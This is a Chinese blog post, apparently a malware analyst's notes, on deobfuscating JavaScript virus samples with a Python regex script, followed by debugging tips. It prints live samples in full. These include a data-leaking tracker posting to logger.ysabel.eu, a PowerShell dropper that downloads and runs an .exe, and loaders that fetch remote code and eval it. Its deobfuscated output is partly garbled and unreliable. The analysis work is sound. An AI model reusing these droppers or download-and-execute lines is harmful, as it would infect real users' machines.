Virus_JS3_PyAnalysisAndSummary
2024-06-10 08:34:42
本篇是对JS样本做的简单分析第三篇,有点重复的意思,当巩固吧.
0x1 Sample(TotalSamp_myself\Js–166x–63)
var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];
var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];var visitorData= new visitorData(k);function visitorData(_0xf4c7x3){this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);this[_0x586f[7]]=_0xf4c7x3;try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;var _0xf4c7x4=CreateXMLHttpRequest();_0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);_0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];_0xf4c7x4[_0x586f[31]](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8=_0x586f[32];try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;return xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!=_0x586f[44]){return new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return new ActiveXObject(_0x586f[45]);} else {throw new Error(_0x586f[46]);} ;} ;} ;
0x2 py脚本
#!/usr/bin/env python3
# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sys
import io
import os
import codecs
import re
import shutilPutPath = '063.JS.vir' #JsVirus文件
OutPath = '63_analysis.txt' #提取到的文件myJslog = []AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'):logall = []#print(InPath)if os.path.exists(InPath):f = codecs.open(InPath,ReadTye,'utf-8')#读入到listfor line in f:if None == line:passelse:logall.append(line)f.close()return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典#if os.path.exists(InPath):# pass#else:#要用全局变量把这里变成只写一次吗global AuthorSignf = codecs.open(OutRePath,WriteTye,'utf-8')if AuthorSign == True:f.write('\n*****************************************************\r\n')f.write('* ahoo JsVirusAnalysis ')f.write('\n***************************************************\r\n\n')AuthorSign = Falsefor i in findRe:f.write(i + '\n')f.close()return Truedef JSVirus_Parse():#1.读取文件到LineListmyJslog = ReadLogFile(PutPath)#print(myJslog)writeList_temp = []writeList = []#2.分为两部分处理.f586List = []pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')for line in myJslog:if '_0x586f=["' in line:#2.1 替换16进制--for i in pattern_ascii.findall(line):#方法1#line = line.replace(i[0], chr(int(i[1],16)))#方法2pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)print(line)writeList.append(line)#2.2 分割为数组#line13 = 'var _0x586f=["value","xKeyx","getElementById","URL","&","&"];'#re.match(r"\[(.*)\]",line13[12:]).group(1)f586List = re.match(r"\[(.*)\]",line[12:]).group(1).split(',')print(f586List)else:writeList_temp.append(line)#3.替换数组#3.1查找所有数组''' for testline11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"print(line11)pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11):index = int(arrary)repStr = "*haha*"line11 = pattern_arrary.sub(repStr,line11,count=1)print(line11)'''for line in writeList_temp:pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line):index = int(arrary)repStr = f586List[index]line = pattern_arrary.sub(repStr,line,count=1)#3.2替换分割的字符串+plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') line = plus.sub('',line)writeList.append(line) #4 写入并打开文件WriteResultFile(OutPath,writeList)os.system('notepad.exe ' + OutPath)print('The Virus has been analyzed,there is my advice! Thanks!')return Trueif __name__ == '__main__':JSVirus_Parse()0x3 输出结果
做过美容的.
var _0x586f=["value","xKeyx","getElementById","URL","&","&","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];var k = document["getElementById"]("xKeyx")["value"];
var visitorData = new visitorData(k);function visitorData(_0xf4c7x3) {this["URL"] = document["URL"]["replace"]("&", "&");this["k"] = _0xf4c7x3;try {this["referrer"] = top["document"]["referrer"]["replace"]("&", "&");} catch (err) {this["referrer"] = "err";};var _0xf4c7x4 = CreateXMLHttpRequest();_0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true);_0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml");var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return new ActiveXObject("undefined");} else {throw new Error("Microsoft.XMLHTTP");} ;} ;} ;0x4 注意
[1]生成代码后做个美容(格式化)
http://www.css88.com/tool/js_beautify/
[2]正则测试工具(F:\RegTestTool.exe)
0x5下面做点扩充吧,js的都往后续…
0x5.1 Num25
var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));
d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);0x5.2 Num41
var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0";
var x = new Array("jaysonandfrisby.com","romiecoston.com");
var z1 = "Msxml2.XMLHTTP";
var z4 = "a";
for (var i=0; i<2; i++) {var e = new ActiveXObject(z1); try { e.open("GET", "http://"+x[i]+"/counter/?"+m, false); e.send(); if (e.status == 200) {var z3 = e.responseText; var z3 = z3.split(m); var z3 = z3.join(z4); eval(z3); break; }; } catch(e) { };};0x5.3 Num29
0x5.3.1样本
var random=function(){return Math.random()};try{var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false);objHttp.Send();if(objHttp.Status== 200){eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")}}catch(e){}0x5.3.2Py代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sys
import io
import os
import codecs
import re
import shutilPutPath = '029.JS.vir'
OutPath = '29_analysis.txt' #提取到的文件.myJslog = []AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'):logall = []#print(InPath)if os.path.exists(InPath):f = codecs.open(InPath,ReadTye,'utf-8')#读入到listfor line in f:if None == line:passelse:logall.append(line)f.close()return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典#if os.path.exists(InPath):# pass#else:#要用全局变量把这里变成只写一次吗global AuthorSignf = codecs.open(OutRePath,WriteTye,'utf-8')if AuthorSign == True:f.write('\n*****************************************************\r\n')f.write('* ahoo JsVirusAnalysis ')f.write('\n***************************************************\r\n\n')AuthorSign = Falsefor i in findRe:f.write(i + '\n')f.close()return Truedef JSVirus_Parse():#1.读取文件到LineListmyJslog = ReadLogFile(PutPath)#print(myJslog)writeList = []pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')for line in myJslog: for i in pattern_ascii.findall(line):#方法1#line = line.replace(i[0], chr(int(i[1],16)))#方法2pattern_tem = re.compile(r'(\\x[0-9][a-zA-Z0-9])')line = pattern_tem.sub(chr(int(i[1],16)),line,count =1)print(line)writeList.append(line)#4 写入并打开文件WriteResultFile(OutPath,writeList)os.system('notepad.exe ' + OutPath)print('The Virus has been analyzed,there is my advice! Thanks!')return Trueif __name__ == '__main__':JSVirus_Parse()0x5.3.3输出
*****************************************************
* ahoo JsVirusAnalysis
***************************************************var random=function(){
return Math.random()};
try{
var objHttp=WScript.CreateObject("MSXML2.XMLHTTP");
objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false);
objHttp.Send();if(objHttp.Status== 200){ eval(objHttp.responseText+ "downAndExec("pg6v");")}
}
catch(e){}
0x6 小结
强调一点:复杂的看不懂的先美化,就好找规律多了
【调试】js/vbs(默认调试器vs2013):cmd:WScript.exe /x name.js/vbs
【调试】JS(od-找downhttp):OD载入wscript.exe,调试->参数(jsPaht),ctrl+F2,bp UrlCanonicalizeA/W,F9.
【调试】正则工具: F:\RegTestTool.exe
【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)
【代码美化-JS】http://www.css88.com/tool/js_beautify/
【VB关键字】executeglobal(str) EXECUTE(str)
【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)
【正则】1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line)2.替换某一行中的所有符合条件''' for testline11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"print(line11)pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11):index = int(arrary)repStr = "*haha*"line11 = pattern_arrary.sub(repStr,line11,count=1)print(line11)'''3.替换\0x56为char'''line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");'pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')for i in pattern_ascii.findall(line):#方法1#line = line.replace(i[0], chr(int(i[1],16)))#方法2pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)print(line)'''Virus_JS3_PyAnalysisAndSummary相关推荐
最新文章
- 用 Flask 来写个轻博客 (9) — M(V)C_Jinja 语法基础快速概览
- 需要添加什么头文件_速冻水饺为什么需要食品添加剂?
- 大学计算机技术类社团/组织——社团官方网站
- LINUX 如何实现多线程进行cp复制
- Wix 安装部署(二)自定义安装界面和行为
- ubuntu 18.04 ROS melodic 尝试 ROS CANOPEN 控制 AGV
- oracle v$sysstat性能视图
- CAnimation-模拟时钟
- MVC中的service controller 有状态,无状态Bean线程安全
- 第十三次CCFCSP认证(2018年3月)真题碰撞的小球
- 30G 上亿数据的超大文件,如何快速导入生产环境?
- java怎么打印课程表_自明排课系统如何打印?教你打印课表的方法
- 软件生命周期模型优缺点及适用范围
- 中国一共有多少神仙!今天让大家开开眼!
- python在使用pyinstaller打包文件时提示找不到指定模块
- 新手看过来----讨厌的运算符
- 机动目标运动分析——IMM篇
- 输入年月判断这个月有多少天
- 为什么 Storm 比 Hadoop 快?是由哪几个方面决定的?
- Android Studio编写一个手写字体识别程序